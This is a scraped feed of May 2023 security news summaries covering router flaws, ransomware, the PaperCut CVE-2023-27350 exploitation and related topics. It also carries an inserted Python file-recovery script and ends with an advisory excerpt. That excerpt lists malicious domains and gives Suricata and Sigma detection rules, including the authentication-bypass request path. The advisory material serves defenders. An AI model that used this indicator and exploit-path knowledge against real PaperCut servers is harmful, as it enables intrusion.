                Autosummary: "The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a new analysis shared with The Hacker News. "


                Netgear Routers' Flaws Expose Users to Malware, Remote Attacks, and Surveillance

                exploits
                2023-05-12 https://thehackernews.com/2023/05/netgear-routers-flaws-expose-users-to.html
                As many as five security flaws have been disclosed in Netgear RAX30 routers that could be chained to bypass authentication and achieve remote code execution. "Successful exploits could allow attackers to monitor users' internet activity, hijack internet connections, and redirect traffic to malicious websites or inject malware into network traffic," Claroty security researcher Uri Katz said in a "

                Autosummary: "


                Bl00dy Ransomware Gang Strikes Education Sector with Critical PaperCut Vulnerability

                exploits ransomware
                2023-05-12 https://thehackernews.com/2023/05/bl00dy-ransomware-gang-strikes.html
                U.S. cybersecurity and intelligence agencies have warned of attacks carried out by a threat actor known as the Bl00dy Ransomware Gang that attempt to exploit vulnerable PaperCut servers against the education facilities sector in the country. The attacks took place in early May 2023, the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) said in a "

                Autosummary: "


                New Flaw in WordPress Plugin Used by Over a Million Sites Under Active Exploitation

                exploits
                2023-05-12 https://thehackernews.com/2023/05/severe-security-flaw-exposes-over.html
                A security vulnerability has been disclosed in the popular WordPress plugin Essential Addons for Elementor that could be potentially exploited to achieve elevated privileges on affected sites. The issue, tracked as CVE-2023-32243, has been addressed by the plugin maintainers in version 5.7.2 that was shipped on May 11, 2023. Essential Addons for Elementor has over one million active "

                Autosummary: Essential Addons for Elementor Plugin Flaw Actively Exploited: Wordfence, in its own advisory, said the critical vulnerability in the Essential Addons for Elementor plugin is being actively exploited in the wild, and that it blocked 200 attacks targeting the flaw in the past 24 hours, making it imperative that users move quickly to update to the latest version. "


                Babuk code used by 9 ransomware gangs to encrypt VMWare ESXi servers

                exploits ransomware
                2023-05-11 https://www.bleepingcomputer.com/news/security/babuk-code-used-by-9-ransomware-gangs-to-encrypt-vmware-esxi-servers/
                An increasing number of ransomware operations are adopting the leaked Babuk ransomware source code to create Linux encryptors targeting VMware ESXi servers. [...] "

                Autosummary: "


                WordPress Elementor plugin bug let attackers hijack accounts on 1M sites

                exploits
                2023-05-11 https://www.bleepingcomputer.com/news/security/wordpress-elementor-plugin-bug-let-attackers-hijack-accounts-on-1m-sites/
                One of WordPress's most popular Elementor plugins, "Essential Addons for Elementor," was found to be vulnerable to an unauthenticated privilege escalation that could allow remote attackers to gain administrator rights on the site. [...] "

                Autosummary: The attacker must also provide the correct nonce value on the "eael-resetpassword-nonce" to validate the password reset request and set a new password on the "eael-pass1" and "eael-pass2" parameters. "


                Microsoft patches bypass for recently fixed Outlook zero-click bug

                exploits
                2023-05-11 https://www.bleepingcomputer.com/news/microsoft/microsoft-patches-bypass-for-recently-fixed-outlook-zero-click-bug/
                Microsoft fixed a security vulnerability this week that could be used by remote attackers to bypass recent patches for a critical Outlook zero-day security flaw abused in the wild. [...] "

                Autosummary: Exploited by Russian state hackers for data theft: As Microsoft revealed in a private threat analytics report, it was exploited by Russian APT28 state hackers (aka STRONTIUM, Sednit, Sofacy, or Fancy Bear) in attacks against at least 14 government, military, energy, and transportation organizations between mid-April and December 2022. "


                Stealthier version of Linux BPFDoor malware spotted in the wild

                exploits
                2023-05-11 https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/
                A new, stealthier variant of the Linux malware "BPFDoor" has been discovered, featuring more robust encryption and reverse shell communications. [...] "

                Autosummary: Looking for the magic byte sequence (Deep Instinct). At this stage, BPFDoor attaches a Berkeley Packet Filter to the socket to read only UDP, TCP, and SCTP traffic through ports 22 (SSH), 80 (HTTP), and 443 (HTTPS). "


                Multinational tech firm ABB hit by Black Basta ransomware attack

                exploits ransomware
                2023-05-11 https://www.bleepingcomputer.com/news/security/multinational-tech-firm-abb-hit-by-black-basta-ransomware-attack/
                Swiss multinational company ABB, a leading electrification and automation technology provider, has suffered a Black Basta ransomware attack, reportedly impacting business operations. [...] "

                Autosummary: "ABB operates more than 40 U.S.-based engineering, manufacturing, research and service facilities with a proven track record serving a diversity of federal agencies including the Department of Defense, such as U.S. Army Corps of Engineers, and Federal Civilian agencies such as the Departments of Interior, Transportation, Energy, United States Coast Guard, as well as the U.S. Postal Service," reads the ABB web site. "


                Brightly warns of SchoolDude data breach exposing credentials

                financial
                2023-05-11 https://www.bleepingcomputer.com/news/security/brightly-warns-of-schooldude-data-breach-exposing-credentials/
                U.S. tech company and Siemens subsidiary Brightly Software is notifying customers that their personal information and credentials were stolen by attackers who gained access to the database of its SchoolDude online platform. [...] "

                Autosummary: "


                Malwarebytes achieves perfect score in latest AVLab assessment

                exploits
                2023-05-11 https://www.malwarebytes.com/blog/business/2023/05/malwarebytes-achieves-perfect-score-in-latest-avlab-assessment

                Categories: Business

                We blocked 100% of malware for the sixth consecutive quarter.

                The post Malwarebytes achieves perfect score in latest AVLab assessment appeared first on Malwarebytes Labs.

                "

                Autosummary: In addition, our web protection technologies, MWAC and BrowserGuard, blocked 89% of all threats, surpassing the average web protection blocking rate of 72% across all tested products. "


                May's Patch Tuesday update includes 3 zero-day flaws; fix them ASAP

                exploits
                2023-05-11 https://www.computerworld.com/article/3696272/mays-patch-tuesday-update-includes-3-zero-day-flaws-fix-them-asap.html#tk.rss_security
                "

                Autosummary: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (ASP.NET Core, .NET …). This month, Microsoft released five critical updates and 22 patches rated important to the Windows platform; they cover the following key components: Windows LDAP (Lightweight Directory Access Protocol). Microsoft development platforms: Microsoft released just two updates this month (CVE-2023-29338 and CVE-2023-29343), both rated important. For those still using the older code base (IE), the retired, out-of-support Internet Explorer 11 desktop application was permanently turned off as part of the February Windows security update ("B" release). Testing guidance: Each month, the team at Readiness analyzes the latest Patch Tuesday updates and provides detailed, actionable testing guidance. "


                Akira ransomware – what you need to know

                exploits ransomware
                2023-05-11 https://www.tripwire.com/state-of-security/akira-ransomware-what-you-need-know
                Akira is a new family of ransomware, first used in cybercrime attacks in March 2023. Read more about the threat in my article on the Tripwire State of Security blog. "

                Autosummary: According to a report by Bleeping Computer, files with the following extensions are encrypted in the attack: .abcddb, .abs, .abx, .accdb, .accdc, .accde, .accdr, .accdt, .accdw, .accft, .adb, .ade, .adf, .adn, .adp, .alf, .arc, .ask, .avdx, .avhd, .bdf, .bin, .btr, .cat, .cdb, .ckp, .cma, .cpd, .dacpac, .dad, .dadiagrams, .daschema, .db-shm, .db-wal, .dbc, .dbf, .dbs, .dbt, .dbv, .dbx, .dcb, .dct, .dcx, .ddl, .dlis, .dqy, .dsk, .dsn, .dtsx, .dxl, .eco, .ecx, .edb, .epim, .exb, .fcd, .fdb, .fic, .fmp, .fmp12, .fmpsl, .fol, .fpt, .frm, .gdb, .grdb, .gwi, .hdb, .his, .hjt, .icg, .icr, .idb, .ihx, .iso, .itdb, .itw, .jet, .jtx, .kdb, .kdb, .kexi, .kexic, .kexis, .lgc, .lut, .lwx, .maf, .maq, .mar, .mas, .mav, .maw, .mdb, .mdf, .mdn, .mdt, .mpd, .mrg, .mud, .mwb, .myd, .ndf, .nnt, .nrmlib, .nsf, .nvram, .nwdb, .nyf, .odb, .oqy, .ora, .orx, .owc, .pan, .pdb, .pdm, .pnz, .pvm, .qcow2, .qry, .qvd, .raw, .rbf, .rctd, .rod, .rodx, .rpd, .rsd, .sas7bdat, .sbf, .scx, .sdb, .sdc, .sdf, .sis, .spq, .sql, .sqlite, .sqlite3, .sqlitedb, .subvol, .temx, .tmd, .tps, .trc, .trm, .udb, .udl, .usr, .vdi, .vhd, .vhdx, .vis, .vmcx, .vmdk, .vmem, .vmrs, .vmsd, .vmsn, .vmx, .vpd, .vsv, .vvv, .wdb, .wmdb, .wrk, .xdb, .xld, .xmlff So, if my company doesn't have a secure backup that it can restore these files from, it may find itself in a sticky pickle... According to announcements on Akira's leak website on the dark web, the ransomware has already hit a variety of organisations in the finance, real estate, and manufacturing sectors as well as a children's daycare centre. The site, which is reachable via Tor, adopts an old-school green-on-black theme, with visitors invited to type in commands rather than navigate through a menu. We will study in depth your finance, bank & income statements, your savings, investments etc. and present our reasonable demand to you. "


                How Attack Surface Management Supports Continuous Threat Exposure Management

                ransomware
                2023-05-11 https://thehackernews.com/2023/05/how-attack-surface-management-supports.html
                According to Forrester, External Attack Surface Management (EASM) emerged as a market category in 2021 and gained popularity in 2022. In a different report, Gartner concluded that vulnerability management vendors are expanding their offerings to include Attack Surface Management (ASM) for a suite of comprehensive offensive security solutions. Recognition from global analysts has officially put "

                Autosummary: 5 Phases of Continuous Threat Exposure Management: Scoping, Discovery, Prioritization, Validation, Mobilization. Attack Surface Management assists in the first three phases of CTEM (scoping, discovery, and prioritization) by supporting businesses through the inventory of known digital assets, continuous discovery of unknown assets, and human intelligence to prioritize severe exposures for timely remediation. With 20 years of experience, their cybersecurity experts secure prominent organizations worldwide, including top banks, cloud providers, healthcare companies, and Fortune 500 firms. "


                Babuk Source Code Sparks 9 Different Ransomware Strains Targeting VMware ESXi Systems

                exploits ransomware
                2023-05-11 https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
                Multiple threat actors have capitalized on the leak of Babuk (aka Babak or Babyk) ransomware code in September 2021 to build as many as nine different ransomware families capable of targeting VMware ESXi systems. "These variants emerged through H2 2022 and H1 2023, which shows an increasing trend of Babuk source code adoption," SentinelOne security researcher Alex Delamotte said in a report "

                Autosummary: Since bursting on the scene in September 2022, Royal ransomware has claimed responsibility for targeting 157 organizations on their leak site, with most of the attacks targeting manufacturing, retail, legal services, education, construction, and healthcare services in the U.S., Canada, and Germany. "


                Andoryu Botnet Exploits Critical Ruckus Wireless Flaw for Widespread Attack

                exploits
                2023-05-11 https://thehackernews.com/2023/05/andoryu-botnet-exploits-critical-ruckus.html
                A nascent botnet called Andoryu has been found to exploit a now-patched critical security flaw in the Ruckus Wireless Admin panel to break into vulnerable devices. The flaw, tracked as CVE-2023-25717 (CVSS score: 9.8), stems from improper handling of HTTP requests, leading to unauthenticated remote code execution and a complete compromise of wireless Access Point (AP) equipment. Andoryu was "

                Autosummary: The flaw, tracked as CVE-2023-25717 (CVSS score: 9.8), stems from improper handling of HTTP requests, leading to unauthenticated remote code execution and a complete compromise of wireless Access Point (AP) equipment. "


                Cybersecurity firm Dragos discloses cybersecurity incident, extortion attempt

                ciber
                2023-05-10 https://www.bleepingcomputer.com/news/security/cybersecurity-firm-dragos-discloses-cybersecurity-incident-extortion-attempt/
                Industrial cybersecurity company Dragos today disclosed what it describes as a "cybersecurity event" after a known cybercrime gang attempted to breach its defenses and infiltrate the internal network to encrypt devices. [...] "

                Autosummary: During the 16 hours they had access to the employee's account, the threat actors failed to also access multiple Dragos systems—including its messaging, IT helpdesk, financial, request for proposal (RFP), employee recognition, and marketing systems—due to role-based access control (RBAC) rules. "


                Surprise! Coldplay lyrics hidden in Kingston SSD firmware

                industry
                2023-05-10 https://www.bleepingcomputer.com/news/technology/surprise-coldplay-lyrics-hidden-in-kingston-ssd-firmware/
                What has firmware got to do with pop rock, you ask? That's the question that crossed a security researcher's mind as he analyzed Kingston's firmware and stumbled upon the lyrics of a popular Coldplay song buried deep within it. [...] "

                Autosummary: Kingston's SSD firmware ZIP contents (BleepingComputer) While the contents of the ZIP file hardly raise an eyebrow and contain release notes along with a working firmware (*.bin) file, it's what's inside the ".bin" that you can't unsee: Lyrics of Coldplay's 2002 song The Scientist buried in firmware (BleepingComputer) "I found Coldplay lyrics in SSD controller firmware," Starke told BleepingComputer after analyzing Kingston firmware versioned "SKC2000_S2681103." "


                New "Greatness" service simplifies Microsoft 365 phishing attacks

                financial
                2023-05-10 https://www.bleepingcomputer.com/news/security/new-greatness-service-simplifies-microsoft-365-phishing-attacks/
                The Phishing-as-a-Service (PhaaS) platform named "Greatness" has seen a spike in activity as it targets organizations using Microsoft 365 in the United States, Canada, the U.K., Australia, and South Africa. [...] "

                Autosummary: Most victims are located in the United States, with many working in manufacturing, healthcare, technology, education, real estate, construction, finance, and business services. "


                Fake in-browser Windows updates push Aurora info-stealer malware

                exploits
                2023-05-10 https://www.bleepingcomputer.com/news/security/fake-in-browser-windows-updates-push-aurora-info-stealer-malware/
                A recently spotted malvertising campaign tricked users with an in-browser Windows update simulation to deliver the Aurora information stealing malware. [...] "

                Autosummary: Fake Windows update (Malwarebytes) The researchers tracked more than a dozen domains used in the campaigns, many of them appearing to impersonate adult websites, that simulated the fake Windows update: activessd[.]ru, chistauyavoda[.]ru, xxxxxxxxxxxxxxx[.]ru, activehdd[.]ru, oled8kultra[.]ru, xhamster-18[.]ru, oled8kultra[.]site, activessd6[.]ru, activedebian[.]ru, shluhapizdec[.]ru, 04042023[.]ru, clickaineasdfer[.]ru, moskovpizda[.]ru, pochelvpizdy[.]ru, evatds[.]ru, click7adilla[.]ru, grhfgetraeg6yrt[.]site. All of them served for download a file named "ChromeUpdate.exe," revealing the deception of the full-screen browser screen; however, some users were still tricked into deploying the malicious executable. "


                New ransomware decryptor recovers data from partially encrypted files

                exploits ransomware
                2023-05-10 https://www.bleepingcomputer.com/news/security/new-ransomware-decryptor-recovers-data-from-partially-encrypted-files/
                Security researchers have shared a new Python-based ransomware recovery tool named "White Phoenix" on GitHub, which lets victims of ransomware strains that use intermittent encryption recover their files for free. [...] "

                Autosummary: These files using the ZIP format include Word (docx, docm, dotx, dotm, odt), Excel (xlsx, xlsm, xltx, xltm, xlsb, xlam, ods), and PowerPoint (pptx, pptm, potx, potm, ppsx, ppsm, odp) document formats. BlackCat's intermittent encryption (CyberArk) However, according to CyberArk, which developed and published "White Phoenix," this tactic introduces weaknesses to the encryption, as leaving parts of the original files unencrypted creates the potential for free data recovery. "
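                The weakness CyberArk describes above, shown as an added illustration (this is not White Phoenix's code; the sample container and the damage pattern are constructed here): OOXML and ODF documents are ZIP containers, so a carver that walks the file looking for local file header signatures can validate and extract every member whose header, compressed payload and CRC-32 escaped encryption, even after the central directory at the end of the file has been overwritten and ordinary ZIP tools refuse to open it.

```python
"""Carving intact members out of an intermittently encrypted ZIP container.

Added example for illustration; not CyberArk's White Phoenix code, though it
follows the same idea: in OOXML (docx/xlsx/pptx) and ODF files the container is
a ZIP, so any member whose local header and compressed payload were skipped by
the ransomware can still be pulled out and checked against its CRC-32.
The sample "document" and the damage pattern below are constructed.
"""
from __future__ import annotations

import io
import random
import struct
import zipfile
import zlib

LFH_SIG = b"PK\x03\x04"
LFH_FMT = "<4sHHHHHIIIHH"          # ZIP local file header (30 bytes)
LFH_LEN = struct.calcsize(LFH_FMT)

# Constructed OOXML-like parts; stand-in XML, not a real Word file.
SAMPLE_PARTS = {
    "[Content_Types].xml": "<Types/>",
    "word/document.xml": "<w:document>" + "Quarterly numbers. " * 300 + "</w:document>",
    "word/styles.xml": "<w:styles>" + "<w:style/>" * 500 + "</w:styles>",
    "docProps/core.xml": "<cp:coreProperties/>",
}


def carve_zip_members(blob: bytes) -> dict[str, bytes]:
    """Scan for local file headers and return {name: data} for every member
    whose header, payload and CRC-32 all survived. Needs neither the central
    directory nor the end-of-central-directory record that zipfile relies on."""
    recovered: dict[str, bytes] = {}
    pos = 0
    while (pos := blob.find(LFH_SIG, pos)) != -1 and pos + LFH_LEN <= len(blob):
        (_, _ver, flags, method, _time, _date,
         crc, csize, usize, nlen, xlen) = struct.unpack_from(LFH_FMT, blob, pos)
        name_start = pos + LFH_LEN
        data_start = name_start + nlen + xlen
        data_end = data_start + csize
        # Bit 3 means CRC/sizes live in a trailing data descriptor, not here;
        # only stored (0) and deflated (8) members are handled.
        if flags & 0x08 or method not in (0, 8) or data_end > len(blob):
            pos += 1
            continue
        try:
            name = blob[name_start:name_start + nlen].decode("utf-8")
            payload = blob[data_start:data_end]
            data = payload if method == 0 else zlib.decompress(payload, -15)
        except (UnicodeDecodeError, zlib.error):
            pos += 1
            continue
        if len(data) == usize and zlib.crc32(data) == crc:
            recovered[name] = data
            pos = data_end          # skip past the validated member
        else:
            pos += 1                # damaged or a false signature: keep scanning
    return recovered


def build_sample_docx() -> tuple[bytes, dict[str, tuple[int, int]]]:
    """Write SAMPLE_PARTS into an in-memory ZIP and record each member's
    [start, end) byte span so the simulated damage can be placed precisely."""
    buf = io.BytesIO()
    spans: dict[str, tuple[int, int]] = {}
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in SAMPLE_PARTS.items():
            start = buf.tell()
            zf.writestr(name, body)
            spans[name] = (start, buf.tell())
    return buf.getvalue(), spans


def simulate_intermittent_encryption(blob: bytes, ranges, seed: int = 1337) -> bytes:
    """Overwrite the given byte ranges with pseudo-random bytes, standing in for
    a ransomware family that encrypts only some blocks of each file."""
    rng = random.Random(seed)
    out = bytearray(blob)
    for start, end in ranges:
        out[start:end] = rng.randbytes(end - start)
    return bytes(out)


def demo() -> dict[str, bytes]:
    """'Encrypt' word/document.xml plus the trailing central directory, then carve.
    zipfile can no longer open the result, but three of four members verify."""
    intact, spans = build_sample_docx()
    last_member_end = max(end for _, end in spans.values())
    damaged = simulate_intermittent_encryption(
        intact, [spans["word/document.xml"], (last_member_end, len(intact))])
    return carve_zip_members(damaged)


if __name__ == "__main__":
    for name, data in demo().items():
        print(f"recovered {name}: {len(data)} bytes")
```

                demo() returns the members that still verify; the document body is gone, but the recovered parts can be re-packed into a valid container. The same scan-and-verify approach applies to any format made of independently checksummed chunks, which is why intermittent encryption trades recoverability for speed.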


                RapperBot DDoS malware adds cryptojacking as new revenue stream

                exploits
                2023-05-10 https://www.bleepingcomputer.com/news/security/rapperbot-ddos-malware-adds-cryptojacking-as-new-revenue-stream/
                New samples of the RapperBot botnet malware have added cryptojacking capabilites to mine for cryptocurrency on compromised Intel x64 machines. [...] "

                Autosummary: Encoded victim registration request (Fortinet) While the researchers did not observe any DDoS commands sent from the C2 server to the analyzed samples, they discovered that the latest bot version supports the following commands: Perform DDoS attacks (UDP, TCP, and HTTP GET) "


                Navigating mobile malware trends: Crucial insights and predictions for MSPs

                exploits
                2023-05-10 https://www.malwarebytes.com/blog/business/2023/05/navigating-mobile-malware-trends-crucial-insights-and-predictions-for-msps

                Categories: Business

                How MSPs can prepare for the complex landscape of mobile malware.

                The post Navigating mobile malware trends: Crucial insights and predictions for MSPs appeared first on Malwarebytes Labs.

                "

                Autosummary: Safe web browsing; block ads and ad trackers; filter suspicious fraudulent texts; spam call blocking. Malwarebytes makes mobile device security easy: with Malwarebytes Mobile Security for MSPs, you can monitor and protect your clients’ mobile investments from a single pane of glass. MSPs can easily begin protecting Chromebooks, Android, iPadOS, and iOS devices, guarding against the latest mobile threats such as ransomware, malicious apps, and PUPs. Some features of a robust mobile threat defense product include: 24/7 real-time protection against emerging threats; advanced antivirus, anti-malware, anti-spyware capabilities; malicious app protection; app privacy audit. "


                Update now! May 2023 Patch Tuesday tackles three zero-days

                exploits
                2023-05-10 https://www.malwarebytes.com/blog/news/2023/05/update-now-may-2023-patch-tuesday-tackles-3-zero-day-vulnerabilities

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Microsoft

                Tags: CVE-2023-29336

                Tags: CVE-2023-24932

                Tags: bootkit

                Tags: CVE-2023-29325

                Tags: Outlook

                Tags: preview

                Tags: CVE-2023-24941

                Tags: Apple

                Tags: Cisco

                Tags: Google

                Tags: Android

                Tags: VMWare

                Tags: SAP

                Tags: Mozilla

                Microsoft's Patch Tuesday round up for May 2023 includes patches for three zero-day vulnerabilities and one critical remote code execution vulnerability

                The post Update now! May 2023 Patch Tuesday tackles three zero-days appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: May 10, 2023. It's that time of the month again: We're looking at May's Patch Tuesday roundup. The three zero-days are listed as: CVE-2023-29336: a Win32k Elevation of Privilege (EoP) vulnerability. "


                How to spot and avoid a tech support scam

                financial
                2023-05-10 https://www.malwarebytes.com/blog/personal/2023/05/how-to-spot-and-avoid-a-tech-support-scam

                Categories: Awareness

                Categories: Personal

                Categories: Scams

                Tags: Tech Support Scams

                Tags: Malwarebytes

                Tags: impersonating

                Tags: screen lockers

                Tags: fake warnings

                Tags: remote access

                Tech support scams are an ongoing nuisance. Knowing how they operate helps you to recognize them.

                The post How to spot and avoid a tech support scam appeared first on Malwarebytes Labs.

                "

                Autosummary: For a very detailed breakdown of tech support scams, how they operate, and more suggestions to keep yourself safe from harm, please check out our dedicated tech support scams page. How to deal with tech support scams As a security provider with a good reputation, we do get a lot of impersonators, like in the example below. At the same time, the legal case against tech support scams originating in the US has proven to be difficult over the past few years, and prosecution has been limited.If your browser or mobile device “locks up”, meaning you’re no longer able to navigate away from a virus warning, you’re likely part of a tech support scam. "


                Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG

                exploits
                2023-05-10 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a

                SUMMARY

                The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials. PaperCut released a patch in March 2023.

                According to FBI-observed information, malicious actors exploited CVE-2023-27350 beginning in mid-April 2023 and continuing through the present. In early May 2023, also according to FBI information, a group self-identifying as the Bl00dy Ransomware Gang attempted to exploit vulnerable PaperCut servers against the Education Facilities Subsector.

                This joint advisory provides detection methods for exploitation of CVE-2023-27350 as well as indicators of compromise (IOCs) associated with Bl00dy Ransomware Gang activity. FBI and CISA strongly encourage users and administrators to immediately apply patches, and workarounds if unable to patch. FBI and CISA especially encourage organizations that did not patch immediately to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.

                TECHNICAL DETAILS

                Vulnerability Overview

                Autosummary: CVE-2023-27350 allows a remote actor to bypass authentication and conduct remote code execution on the following affected installations of PaperCut:[1]
                Version 8.0.0 to 19.2.7
                Version 20.0.0 to 20.1.6
                Version 21.0.0 to 21.2.10
                Version 22.0.0 to 22.0.8

                The following additional Emerging Threat Suricata signatures are designed to detect Domain Name System (DNS) lookups of known malicious domains associated with recent PaperCut exploitation:
                alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowcsupdates .com)"; dns_query; content:"windowcsupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)windowcsupdates\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdate .com)"; dns_query; content:"anydeskupdate.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)anydeskupdate\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdates .com)"; dns_query; content:"anydeskupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)anydeskupdates\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecemter .com)"; dns_query; content:"windowservicecemter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)windowservicecemter\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (winserverupdates .com)"; dns_query; content:"winserverupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)winserverupdates\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (netviewremote .com)"; dns_query; content:"netviewremote.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)netviewremote\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (updateservicecenter .com)"; dns_query; content:"updateservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)updateservicecenter\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecenter .com)"; dns_query; content:"windowservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)windowservicecenter\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecentar .com)"; dns_query; content:"windowservicecentar.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|\.)windowservicecentar\.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category ATTACK_RESPONSE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
                Note that these signatures may also not work if the actor modified activity to evade detection by known rules.

                Suricata signatures for the SetupCompleted authentication bypass request:
                alert http any any -> $HOME_NET any (\
                    msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; \
                    flow:established,to_server; \
                    http.method; content:"GET"; \
                    http.uri; content:"/app?service=page/SetupCompleted"; bsize:32; fast_pattern; \
                    reference:cve,2023-27350; \
                    classtype:attempted-admin; \
                alert http any any -> $HOME_NET any (msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"page/SetupCompleted"; fast_pattern; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; reference:cve,2023-27350; classtype:attempted-admin; metadata:attack_target Server, cve CVE_2023_27350, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, confidence High, signature_severity Major, updated_at 2023_05_05;)
                Note that these signatures and other rule-based detections, including YARA rules, may fail to detect more advanced iterations of CVE-2023-27350 exploits.

                Sigma rule for process creation on the PaperCut server:
                title: PaperCut MF/NG Vulnerability
                authors: Huntress DE&TH Team
                description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
                logsource:
                    category: process_creation
                    product: windows
                detection:
                    selection:
                        ParentImage|endswith: "\\pc-app.exe"
                        Image|endswith:
                            - "\\cmd.exe"
                            - "\\powershell.exe"
                    condition: selection
                level: high
                falsepositives:
                    - Expected admin activity
                More advanced versions of the exploit can drop a backdoor executable, use living-off-the-land binaries, or attempt to evade the above Sigma rule by spawning an additional child process in-between pc-app.exe and a command-line interpreter.

                Any of the following server log entries may be indicative of a compromise:
                User "admin" updated the config key "print.script.sandboxed"
                User "admin" updated the config key "device.script.sandboxed"
                Admin user "admin" modified the print script on printer
                User/Group Sync settings changed by "admin"

                Indicators of Compromise: See Table 1 through Table 6 for IOCs obtained from FBI investigations and open-source information as of early May 2023.
                Table 6: Bl00dy Gang Ransomware Malicious Files
                File | SHA-256 | Description
                /windows/system32/config/systemprofile/appdata/roaming/tor/ | N/A | Unspecified files created in Tor directory
